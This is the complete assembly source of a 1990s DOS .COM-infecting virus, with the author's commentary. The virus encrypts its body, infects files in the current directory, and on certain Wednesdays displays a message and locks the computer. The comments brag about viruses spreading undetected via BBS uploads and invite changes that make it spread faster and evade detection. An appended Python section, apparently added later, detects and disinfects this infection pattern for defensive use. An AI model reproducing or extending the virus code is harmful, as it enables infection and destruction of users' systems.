;******************************************************************************
;
;                         RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
; "If a weaking linkage found, eliminate...
;  Hear the cities' fearful roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
;       Deicide / Glenn
;       Morgoth
;       Breeze
;       Brother
;       Commentator I
;       Commentator II
;       Spawnie
;       Xmas
;       1St_Star / 222
;       T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admit,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus programs
; yet. Deicide is now detectable, but that was my first attempt to make a
; virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize an infected file simply: the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednesday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that make it
; spread faster and make it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass.
; earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (of course only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
;                                                       Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;

              Org   0h                        ; The outcome will be .BIN

Start:        Jmp   MainVir                   ; Jump to main virus
              Db    '*'                       ; Signature (4th byte of the file)

MainVir:      Call  On1                       ; Get virus offset
On1:          Pop   BP                        ; BP is the index register
              Sub   BP,Offset MainVir+3       ; Calculate virus offset
              Push  Ax                        ; And store AX (error reg.)
              Lea   Si,Crypt[BP]              ; Decryptor for the
              Mov   Di,Si                     ; virus code. It's long
              Mov   Cx,CryptLen               ; for a decoder, but it
Decrypt:      Lodsb                           ; reduces the recognizable
              Xor   Al,0                      ; part enough. (The 0 is
              Stosb                           ; patched with the key at
              Loop  Decrypt                   ; infection time, see Infect)
DecrLen       Equ   $-MainVir                 ; Decryptor length

Crypt:        Mov   Ax,Cs:OrgPrg[BP]          ; Store the 4 first bytes
              Mov   Bx,Cs:OrgPrg[BP]+2        ; of the host
              Mov   Cs:Start+100h,Ax          ;
              Mov   Cs:Start[2]+100h,Bx       ;
              Mov   Ah,2ah                    ; Get date
              Int   21h                       ; If it is a Wednesday
              Cmp   Dh,8                      ; after July and after
              Jb    NoMsg                     ; the 21st, it will
              Cmp   Dl,22                     ; continue, else
              Jb    NoMsg                     ; it goes to NoMsg
              Cmp   Al,3                      ;
              Jne   NoMsg                     ;
              Mov   Ah,9                      ; Display the message
              Lea   Dx,Msg[BP]                ;
              Int   21h                       ;
Lockout:      Cli                             ; And lock the computer
              Jmp   Lockout                   ;
NoMsg:        Cmp   Dh,5                      ; Is it after April?
              Jae   DoVirus                   ; Yes - Replicate
              Jmp   Ready                     ; No - Terminate to host
DoVirus:      Mov   Ah,1ah                    ; Move DTA to a safe place
              Mov   Dx,0fc00h                 ; $FE00
              Int   21h                       ;
              Mov   Ah,4eh                    ;
Search:       Lea   Dx,FileSpec[BP]           ; Search for a .COM file in
              Xor   Cx,Cx                     ; the current directory
              Int   21h                       ;
              Jnc   Found                     ; If none found, goto Ready,
              Jmp   Ready                     ; else goto Found
Found:        Mov   Ax,4300h                  ; Get file attributes
              Mov   Dx,0fc1eh                 ; and store them on the stack
              Int   21h                       ;
              Push  Cx                        ;
              Mov   Ax,4301h                  ; Wipe the attributes, so it
              Xor   Cx,Cx                     ; is accessible for us
              Int   21h                       ;
              Mov   Ax,3d02h                  ; Open the file with
              Int   21h                       ; read/write access
              Mov   Bx,5700h                  ; Get the file date/time stamp
              Xchg  Ax,Bx                     ; and store them on the stack
              Int   21h                       ;
              Push  Cx                        ;
              Push  Dx                        ;
              Mov   Ah,3fh                    ; Read the first 4 bytes
              Lea   Dx,OrgPrg[BP]             ; of the program
              Mov   Cx,4                      ;
              Int   21h                       ;
              Mov   Ax,Cs:[OrgPrg][BP]        ; Is it a weird EXE?
              Cmp   Ax,'MZ'                   ; Yes, goto ExeFile
              Je    ExeFile                   ;
              Cmp   Ax,'ZM'                   ; Is it a normal EXE?
              Je    ExeFile                   ; Yes, goto ExeFile
              Mov   Ah,Cs:[OrgPrg+3][BP]      ; Is it already infected?
              Cmp   Ah,'*'                    ; No, goto Infect
              Jne   Infect                    ;
ExeFile:      Call  Close                     ; Close the file
              Mov   Ah,4fh                    ; Jump to the search routine
              Jmp   Search                    ; again for the next .COM file
FSeek:        Xor   Cx,Cx                     ; Subroutine for jumping to
              Xor   Dx,Dx                     ; the begin/end of file
              Int   21h                       ;
              Ret                             ;
Infect:       Mov   Ax,4202h                  ; Jump to EOF
              Call  FSeek                     ;
              Sub   Ax,3                      ; Calculate new virus offset
              Mov   Cs:CallPtr[BP]+1,Ax       ;
              Mov   Ah,2ch                    ; Get system time
              Int   21h                       ;
              Mov   Cs:Decrypt+2[BP],Dl       ; Put the hundredths of a second
              Lea   Si,MainVir[BP]            ; into the XOR command, then move
              Mov   Di,0fd00h                 ; the decryptor part to the end
              Mov   Cx,DecrLen                ; of the 64K segment
              Rep   Movsb                     ;
              Lea   Si,Crypt[BP]              ; Encrypt the virus with
              Mov   Cx,CryptLen               ; the hundredths of a second.
Encrypt:      Lodsb                           ; Merge it behind the
              Xor   Al,Dl                     ; decryptor
              Stosb                           ;
              Loop  Encrypt                   ;
              Mov   Ah,40h                    ; Write the virus
              Lea   Dx,0fd00h                 ; at the end of the
              Mov   Cx,VirLen                 ; file
              Int   21h                       ;
              Mov   Ax,4200h                  ; Move to start of
              Call  FSeek                     ; the file
              Mov   Ah,40h                    ; Write the jump to the virus
              Lea   Dx,CallPtr[BP]            ; at the begin of the file
              Mov   Cx,4                      ;
              Int   21h                       ;
              Call  Close                     ; Close the file
Ready:        Mov   Ah,1ah                    ; Restore the DTA to the
              Mov   Dx,80h                    ; original offset
              Int   21h                       ;
              Pop   Ax                        ; Get (possible) error code
              Mov   Bx,100h                   ; Strange jump (but nice) to
              Push  Cs                        ; the begin of the program
              Push  Bx                        ; (which has been restored)
              Retf                            ;
Close:        Pop   Si                        ; A pop which is stupid
              Pop   Dx                        ; Restore the file's date/time
              Pop   Cx                        ; stamp
              Mov   Ax,5701h                  ;
              Int   21h                       ;
              Mov   Ah,3eh                    ; Close file
              Int   21h                       ;
              Mov   Ax,4301h                  ; Restore attributes
              Pop   Cx                        ;
              Mov   Dx,0fc1eh                 ;
              Int   21h                       ;
              Push  Si                        ; A push which is stupid
              Ret                             ; Return to caller

CallPtr       Db    0e9h,0,0                  ; Jump
FileSpec      Db    '*.COM',0                 ; Filesearch spec & signature

; Activation message
Msg           Db    13,10,9,9,'RTL4'
              Db    13,10,'Joop van den Ende Produkties BV'
              Db    13,10,'Marco Daas (Casting Assistent)'
              Db    13,10,'Postbus 397'
              Db    13,10,'1430 AJ AALSMEER'
              Db    13,10,'van Cleeffkade 15'
              Db    13,10,'1413 BA AALSMEER'
              Db    13,10,'The Netherlands'
              Db    13,10,10,'Wedden dat... je een virus hebt?'
              Db    13,10,'$'

; First 4 bytes of the host program
OrgPrg:       Int   20h
              DB    'GB'                      ; My initials (Glenn Benton)

CryptLen      Equ   $-Crypt                   ; Length of encrypted part
VirLen        Equ   $-MainVir                 ; Length of virus
;
; Sleep well, sleep in hell...
;
; ───────────────────────────────────────────────────────────────────────────
; ────────────────────> and Remember Don't Forget to Call <────────────────
; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
; ───────────────────────────────────────────────────────────────────────────
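A defender-side check for the infection layout the source above describes, written here as an added example (it is not part of the original listing or the author's code). It assumes only what the listing states: the E9 jump at offset 0 with '*' as the 4th byte, a displacement equal to the host length minus 3, a LODSB / XOR AL,imm8 / STOSB / LOOP decrypt loop whose immediate is the clock-derived key, and the host's saved first 4 bytes (OrgPrg) as the last 4 bytes of the encrypted part; the sample file it builds is constructed test data, not a real infected program.

```python
import re

# Byte pattern of the decrypt loop in the stub:
# LODSB / XOR AL,imm8 / STOSB / LOOP -5.  Group 1 is the per-infection
# key that Infect patches into Decrypt+2 from the clock's hundredths.
DECRYPT_LOOP = re.compile(rb"\xAC\x34(.)\xAA\xE2\xFB", re.DOTALL)


def analyze(data: bytes):
    """Return infection details for a .COM image, or None if it looks clean."""
    # Marker: JMP rel16 (E9) at offset 0 and the '*' written as the 4th byte.
    if len(data) < 8 or data[0] != 0xE9 or data[3] != ord("*"):
        return None
    # Infect stores (host length - 3) as the displacement, so the jump lands
    # exactly at the host's old end of file, where the decryptor stub begins.
    orig_len = int.from_bytes(data[1:3], "little") + 3
    if orig_len >= len(data):
        return None
    body = data[orig_len:]
    m = DECRYPT_LOOP.search(body[:64])
    if not m:
        return None
    key = m.group(1)[0]
    plain = bytes(b ^ key for b in body[m.end():])
    # The activation text lives in the encrypted part; so does OrgPrg, which
    # holds the host's real first 4 bytes (the 'GB' initials are overwritten
    # by the 4-byte read at infection time) and is the last thing in the body.
    if b"RTL4" not in plain:
        return None
    return {"key": key, "orig_len": orig_len, "orig_head": plain[-4:]}


def disinfect(data: bytes):
    """Rebuild the host: put its first 4 bytes back and drop the appended body."""
    info = analyze(data)
    if info is None:
        return None
    return info["orig_head"] + data[4 : info["orig_len"]]


def build_sample(key: int = 0x37):
    """Constructed test data: a tiny host, and the same host carrying only the
    layout (jump + '*', loop pattern with NOP filler, XOR'd marker text)."""
    host = b"\xB4\x4C\xCD\x21" + b"\x90" * 20          # mov ah,4Ch / int 21h
    stub = b"\x90\x90" + b"\xAC\x34" + bytes([key]) + b"\xAA\xE2\xFB"
    secret = b"RTL4 constructed marker text" + host[:4]  # ends with OrgPrg
    head = b"\xE9" + (len(host) - 3).to_bytes(2, "little") + b"*"
    return host, head + host[4:] + stub + bytes(b ^ key for b in secret)
```

Because the key is only the hundredths-of-a-second byte (0 to 99) and the loop opcodes are constant, the pattern plus the RTL4 text check identifies the family regardless of which key an infection used.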